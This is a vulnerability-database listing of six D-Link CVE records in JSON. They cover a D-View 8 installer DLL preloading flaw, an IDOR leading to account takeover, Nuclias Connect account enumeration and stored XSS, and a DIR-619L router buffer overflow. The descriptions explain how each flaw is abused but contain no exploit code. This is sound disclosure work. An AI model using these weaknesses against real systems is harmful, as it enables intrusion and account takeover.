828 vulnerabilities by dlink
CVE-2026-23755 (GCVE-0-2026-23755)
Vulnerability from nvd – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09 – CWE-427 - Uncontrolled Search Path Element
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisory, patch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23755",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:07.575974Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:59.815Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427 Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:24.354Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-installer-dll-preloading-via-uncontrolled-search-path"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 Installer DLL Preloading via Uncontrolled Search Path",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23755",
"datePublished": "2026-01-21T18:02:30.160Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:24.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-23754 (GCVE-0-2026-23754)
Vulnerability from nvd – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09 – CWE-639 - Authorization Bypass Through User-Controlled Key
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisory, patch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23754",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:04.543748Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:54.833Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:23.656Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 IDOR Allows Credential Disclosure and Account Takeover",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23754",
"datePublished": "2026-01-21T18:02:45.878Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:23.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34255 (GCVE-0-2025-34255)
Vulnerability from nvd – Published: 2025-10-16 18:52 – Updated: 2026-05-25 23:41 – CWE-204 - Observable Response Discrepancy
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect | Affected: 0, ≤ 1.3.1.4 (custom) | |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34255",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:29:11.316268Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:29:17.095Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"web interface"
],
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain an observable response discrepancy vulnerability.\u0026nbsp;The application\u0027s \u0027Forgot Password\u0027 endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server.\u0026nbsp;NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain an observable response discrepancy vulnerability.\u00a0The application\u0027s \u0027Forgot Password\u0027 endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server.\u00a0NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-575",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-575 Account Footprinting"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204 Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-25T23:41:31.628Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-forgot-password-account-enumeration"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Forgot Password Account Enumeration",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34255",
"datePublished": "2025-10-16T18:52:59.964Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-25T23:41:31.628Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34254 (GCVE-0-2025-34254)
Vulnerability from nvd – Published: 2025-10-16 18:52 – Updated: 2026-05-25 23:41 – CWE-204 - Observable Response Discrepancy
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect | Affected: 0, ≤ 1.3.1.4 (custom) | |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34254",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:29:43.264857Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:29:49.920Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"web interface"
],
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain an observable response discrepancy vulnerability.\u0026nbsp;The application\u0027s \u0027Login\u0027 endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message`string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server.\u0026nbsp;NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain an observable response discrepancy vulnerability.\u00a0The application\u0027s \u0027Login\u0027 endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message`string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server.\u00a0NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-575",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-575 Account Footprinting"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204 Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-25T23:41:30.851Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-login-account-enumeration"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Login Account Enumeration",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34254",
"datePublished": "2025-10-16T18:52:08.435Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-25T23:41:30.851Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34253 (GCVE-0-2025-34253)
Vulnerability from nvd – Published: 2025-10-16 18:53 – Updated: 2026-05-14 02:07 – CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect | Affected: 0, < 1.3.1.4 (custom) | |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34253",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:28:34.087394Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:28:40.054Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThan": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain a stored cross-site scripting (XSS) vulnerability due to improper sanitization of the \u0027Network\u0027 field when editing the configuration, creating a profile, and adding a network. An authenticated attacker can inject arbitrary JavaScript to be executed in the context of other users viewing the profile entry. NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain a stored cross-site scripting (XSS) vulnerability due to improper sanitization of the \u0027Network\u0027 field when editing the configuration, creating a profile, and adding a network. An authenticated attacker can inject arbitrary JavaScript to be executed in the context of other users viewing the profile entry. NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-592",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-592 Stored XSS"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:07:58.251Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-stored-xss"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Stored Cross-Site Scripting (XSS)",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34253",
"datePublished": "2025-10-16T18:53:49.731Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-14T02:07:58.251Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-9566 (GCVE-0-2024-9566)
Vulnerability from nvd – Published: 2024-10-07 13:00 – Updated: 2024-10-07 13:25 – Unsupported When Assigned – CWE-120 - Buffer Overflow
| URL | Tags |
|---|---|
| https://vuldb.com/?id.279460 | vdb-entry, technical-description |
| https://vuldb.com/?ctiid.279460 | signature, permissions-required |
| https://vuldb.com/?submit.414541 | third-party-advisory |
| https://github.com/abcdefg-png/IoT-vulnerable/blo… | exploit |
| https://www.dlink.com/ | product |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | DIR-619L B1 | Affected: 2.06 | |
| d-link | dir-619l_b1 | Affected: 2.06 | cpe:2.3:h:d-link:dir-619l_b1:*:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:h:d-link:dir-619l_b1:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-619l_b1",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "2.06"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-9566",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T13:22:53.741353Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T13:25:20.194Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DIR-619L B1",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.06"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "yhryhryhr_miemie (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as critical was found in D-Link DIR-619L B1 2.06. This vulnerability affects the function formDeviceReboot of the file /goform/formDeviceReboot. The manipulation of the argument next_page leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used."
},
{
"lang": "de",
"value": "In D-Link DIR-619L B1 2.06 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um die Funktion formDeviceReboot der Datei /goform/formDeviceReboot. Mittels dem Manipulieren des Arguments next_page mit unbekannten Daten kann eine buffer overflow-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 8.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 9,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T13:00:07.587Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-279460 | D-Link DIR-619L B1 formDeviceReboot buffer overflow",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.279460"
},
{
"name": "VDB-279460 | CTI Indicators (IOB, IOC, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.279460"
},
{
"name": "Submit #414541 | D-Link DIR-619L B1 2.06 Buffer Overflow",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.414541"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/abcdefg-png/IoT-vulnerable/blob/main/D-Link/DIR-619L/formDeviceReboot.md"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/"
}
],
"tags": [
"unsupported-when-assigned"
],
"timeline": [
{
"lang": "en",
"time": "2024-10-07T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-10-07T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-10-07T08:25:15.000Z",
"value": "VulDB entry last update"
}
],
"title": "D-Link DIR-619L B1 formDeviceReboot buffer overflow"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2024-9566",
"datePublished": "2024-10-07T13:00:07.587Z",
"dateReserved": "2024-10-07T06:19:48.194Z",
